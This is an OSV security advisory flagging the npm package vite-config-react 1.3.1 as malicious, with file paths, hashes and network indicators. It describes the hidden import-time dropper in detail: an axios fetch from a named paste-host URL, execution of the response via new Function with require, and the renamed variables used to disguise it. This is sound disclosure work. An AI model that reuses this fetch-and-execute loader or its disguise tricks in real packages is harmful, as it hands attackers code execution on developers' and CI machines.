MAL-2026-5728

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-react/MAL-2026-5728.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5728

Published

2026-06-13T03:04:40Z

Modified

2026-06-13T04:01:39.754380646Z

Summary

Malicious code in vite-config-react (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)

On require/import of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } }), reads .data.config from the response, and executes the returned string via new Function('require', s)(require) with a Node require constructed through createRequire(import.meta.url). The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch. The dropper additionally shadows the global process with a local object whose keys are renamed DEV_API_KEY, DEV_SECRET_KEY, DEV_SECRET_VALUE so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named getCallers to obscure intent. jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time. Any project that imports this package (for example in vite.config.js) hands the author arbitrary code execution on the developer's or CI machine with full require access.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006278",
            "versions": [
                "1.3.1"
            ],
            "sha256": "79ca138b0d54ede570dc5fdf43ecaa2f258dcdc0020f80d4bfeb708985c1766a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T03:04:41Z",
            "import_time": "2026-06-13T03:48:10.94307621Z"
        },
        {
            "id": "IN-MAL-2026-006277",
            "versions": [
                "1.3.1"
            ],
            "sha256": "d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T03:04:40Z",
            "import_time": "2026-06-13T03:48:10.908991108Z"
        }
    ]
}

References

https://www.npmjs.com/package/vite-config-react/v/1.3.1

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / vite-config-react

Package

Name: vite-config-react; View open source insights on deps.dev
Purl: pkg:npm/vite-config-react

Affected ranges

Affected versions

1.*

1.3.1

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-react/MAL-2026-5728.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "src/features/extras/config.js",
            "sha256": "d100938f64c4cc264fd29a4a56d67132ec0d894e860cbfffd4b2fb62f0432422",
            "tlsh": "0b01bd8fa1ac140c057013e7bb1be036f662b1ab390381d5775cc7521fb695ca602ede"
        }
    ],
    "package_integrity": [
        {
            "filename": "vite-config-react-1.3.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-Sy3nR070BFXXj2wm0QjV3lsALhP2ZWKWAU5qakxstWihAGhtdrC+FFLN1WJzehtadNyXTUU0l1Z7Srv2+AV8KA==",
                "sha1": "9b378c94ab42d52c4db2e846469a5a66eb3ffcd7"
            }
        }
    ],
    "ips": [
        "104.16.10.34",
        "10.1.0.2"
    ]
}